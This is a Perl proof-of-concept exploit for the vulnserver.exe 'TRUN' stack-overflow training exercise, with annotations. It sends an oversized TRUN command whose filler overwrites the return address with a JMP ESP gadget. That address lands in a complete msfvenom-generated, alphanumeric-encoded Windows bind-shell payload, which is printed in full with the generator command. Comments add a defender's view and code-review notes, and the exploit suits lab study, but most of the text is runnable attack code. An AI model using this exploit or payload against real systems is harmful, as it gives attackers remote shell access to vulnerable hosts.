vulnserver.exe TRUN
#!/usr/bin/perl
# Proof-of-concept for the well-known vulnserver.exe "TRUN" stack-overflow
# training exercise. A single oversized TRUN command is sent over TCP; the
# filler overruns the saved frame pointer and return address, the return
# address is replaced with a JMP ESP gadget, and execution lands in the
# encoded payload appended after it.
#
# Defender's view: the traffic is easy to characterise on the wire — a
# "TRUN" command followed by a very long run of one repeated byte and a
# short binary tail — and on the host the payload (a bind shell, see the
# msfvenom line below) shows up as a new listening socket owned by the
# crashed service.
use strict;
use warnings;
use Encode qw/encode/;   # NOTE(review): imported but never used in this script
use Socket;
# Lab host and vulnserver's listening port. NOTE(review): inet_aton returns
# undef when the name/address cannot be resolved and that is not checked
# here, so a typo would surface as a confusing sockaddr_in error instead.
my $target = inet_aton("192.168.99.144");
my $port = 9999;
my $portaddr = sockaddr_in($port, $target);
# Command prefix consumed by the vulnerable TRUN handler.
my $header = "TRUN /.:/";
# Filler up to the saved EBP. The 1999 comes from a cyclic-pattern offset
# search; the tool output is kept verbatim in the two "[*]" comments.
my $padding1 = "A" x 1999;
#[*] Exact match at offset 1999
my $ebp = "BBBB";            # 4 bytes that land on the saved frame pointer
#[*] Exact match at offset 2003
#625011AF FFE4 JMP ESP
# Overwritten return address, little-endian encoding of the JMP ESP gadget
# quoted above. A fixed address only works because the module it lives in
# is presumably loaded at a constant base (no ASLR/rebasing) — verify
# against the lab setup rather than assuming.
my $eip = "\xAF\x11\x50\x62";
# Payload as emitted by the generator command below: a Windows TCP bind
# shell, alphanumeric-encoded (x86/alpha_mixed) with 0x00 excluded, and
# built with BufferRegister=ESP, i.e. the decoder stub expects ESP to point
# at its own start — which is exactly where the JMP ESP gadget leaves it.
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl -e x86/alpha_mixed BufferRegister=ESP
my $payload =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x49\x78" .
"\x6d\x52\x65\x50\x75\x50\x45\x50\x45\x30\x6d\x59\x78\x65" .
"\x74\x71\x4b\x70\x30\x64\x4c\x4b\x62\x70\x74\x70\x6e\x6b" .
"\x76\x32\x34\x4c\x4e\x6b\x36\x32\x54\x54\x6c\x4b\x62\x52" .
"\x37\x58\x36\x6f\x4e\x57\x42\x6a\x54\x66\x35\x61\x69\x6f" .
"\x4e\x4c\x37\x4c\x53\x51\x43\x4c\x37\x72\x64\x6c\x55\x70" .
"\x4f\x31\x6a\x6f\x34\x4d\x46\x61\x4f\x37\x4d\x32\x49\x62" .
"\x36\x32\x70\x57\x4e\x6b\x62\x72\x32\x30\x4e\x6b\x63\x7a" .
"\x67\x4c\x6e\x6b\x62\x6c\x66\x71\x31\x68\x69\x73\x70\x48" .
"\x35\x51\x48\x51\x66\x31\x6e\x6b\x61\x49\x51\x30\x56\x61" .
"\x69\x43\x6e\x6b\x57\x39\x45\x48\x4d\x33\x76\x5a\x57\x39" .
"\x4e\x6b\x76\x54\x6e\x6b\x73\x31\x79\x46\x54\x71\x39\x6f" .
"\x6e\x4c\x4b\x71\x38\x4f\x46\x6d\x65\x51\x5a\x67\x34\x78" .
"\x6b\x50\x33\x45\x49\x66\x56\x63\x31\x6d\x5a\x58\x35\x6b" .
"\x53\x4d\x71\x34\x52\x55\x38\x64\x63\x68\x6c\x4b\x36\x38" .
"\x56\x44\x45\x51\x49\x43\x70\x66\x4c\x4b\x34\x4c\x52\x6b" .
"\x6c\x4b\x53\x68\x45\x4c\x76\x61\x49\x43\x4c\x4b\x55\x54" .
"\x4e\x6b\x76\x61\x78\x50\x4c\x49\x37\x34\x45\x74\x31\x34" .
"\x63\x6b\x33\x6b\x70\x61\x76\x39\x42\x7a\x53\x61\x69\x6f" .
"\x79\x70\x61\x4f\x71\x4f\x32\x7a\x6e\x6b\x62\x32\x48\x6b" .
"\x6c\x4d\x51\x4d\x50\x68\x67\x43\x77\x42\x77\x70\x33\x30" .
"\x33\x58\x63\x47\x44\x33\x37\x42\x51\x4f\x30\x54\x63\x58" .
"\x72\x6c\x51\x67\x35\x76\x53\x37\x6b\x4f\x48\x55\x6c\x78" .
"\x7a\x30\x77\x71\x47\x70\x43\x30\x71\x39\x4a\x64\x73\x64" .
"\x70\x50\x50\x68\x46\x49\x4d\x50\x70\x6b\x77\x70\x49\x6f" .
"\x48\x55\x61\x7a\x56\x68\x46\x39\x46\x30\x79\x72\x6b\x4d" .
"\x53\x70\x72\x70\x33\x70\x42\x70\x35\x38\x4b\x5a\x64\x4f" .
"\x4b\x6f\x39\x70\x49\x6f\x4e\x35\x6a\x37\x33\x58\x75\x52" .
"\x77\x70\x46\x71\x31\x4c\x4b\x39\x4a\x46\x51\x7a\x64\x50" .
"\x66\x36\x71\x47\x45\x38\x5a\x62\x6b\x6b\x64\x77\x35\x37" .
"\x39\x6f\x7a\x75\x72\x77\x55\x38\x4e\x57\x4d\x39\x56\x58" .
"\x4b\x4f\x4b\x4f\x79\x45\x43\x67\x62\x48\x61\x64\x68\x6c" .
"\x37\x4b\x38\x61\x6b\x4f\x58\x55\x43\x67\x6e\x77\x62\x48" .
"\x42\x55\x72\x4e\x62\x6d\x63\x51\x4b\x4f\x4e\x35\x55\x38" .
"\x72\x43\x42\x4d\x31\x74\x55\x50\x4c\x49\x79\x73\x51\x47" .
"\x31\x47\x72\x77\x35\x61\x4c\x36\x42\x4a\x46\x72\x72\x79" .
"\x56\x36\x79\x72\x49\x6d\x31\x76\x68\x47\x73\x74\x46\x44" .
"\x47\x4c\x65\x51\x33\x31\x6e\x6d\x73\x74\x74\x64\x44\x50" .
"\x48\x46\x63\x30\x43\x74\x73\x64\x52\x70\x42\x76\x63\x66" .
"\x76\x36\x61\x56\x61\x46\x52\x6e\x42\x76\x63\x66\x43\x63" .
"\x43\x66\x31\x78\x72\x59\x48\x4c\x57\x4f\x6e\x66\x49\x6f" .
"\x48\x55\x4f\x79\x49\x70\x72\x6e\x66\x36\x37\x36\x69\x6f" .
"\x64\x70\x75\x38\x65\x58\x6b\x37\x65\x4d\x31\x70\x69\x6f" .
"\x4a\x75\x4f\x4b\x5a\x50\x58\x35\x4c\x62\x61\x46\x43\x58" .
"\x6e\x46\x4d\x45\x4d\x6d\x4f\x6d\x69\x6f\x78\x55\x55\x6c" .
"\x43\x36\x33\x4c\x76\x6a\x6b\x30\x49\x6b\x49\x70\x54\x35" .
"\x37\x75\x4f\x4b\x73\x77\x72\x33\x34\x32\x30\x6f\x43\x5a" .
"\x55\x50\x30\x53\x6b\x4f\x6b\x65\x41\x41";
# Final buffer layout: command | 1999-byte filler | saved EBP | return
# address | payload.
my $message = $header . $padding1 . $ebp . $eip . $payload;
# Echoes the entire buffer, raw payload bytes included, to STDOUT. The
# trailing "\r\n" is only printed here; it is not part of what is sent.
print $message . "\r\n";
# NOTE(review): bareword filehandle SOCKET — a lexical handle
# (my $sock) would be the modern form. Each step is error-checked.
socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
or die "Can't create a socket $!\n";
connect(SOCKET , $portaddr)
or die "Unable to connect to socket $!\n";
# Treats a short write as failure. NOTE(review): $target here is the
# packed 4-byte address returned by inet_aton, so this message prints raw
# bytes rather than the dotted IP string.
send(SOCKET, $message, 0) == length($message)
or die "cannot send to $target($port): $!";
close SOCKET or die "close: $!";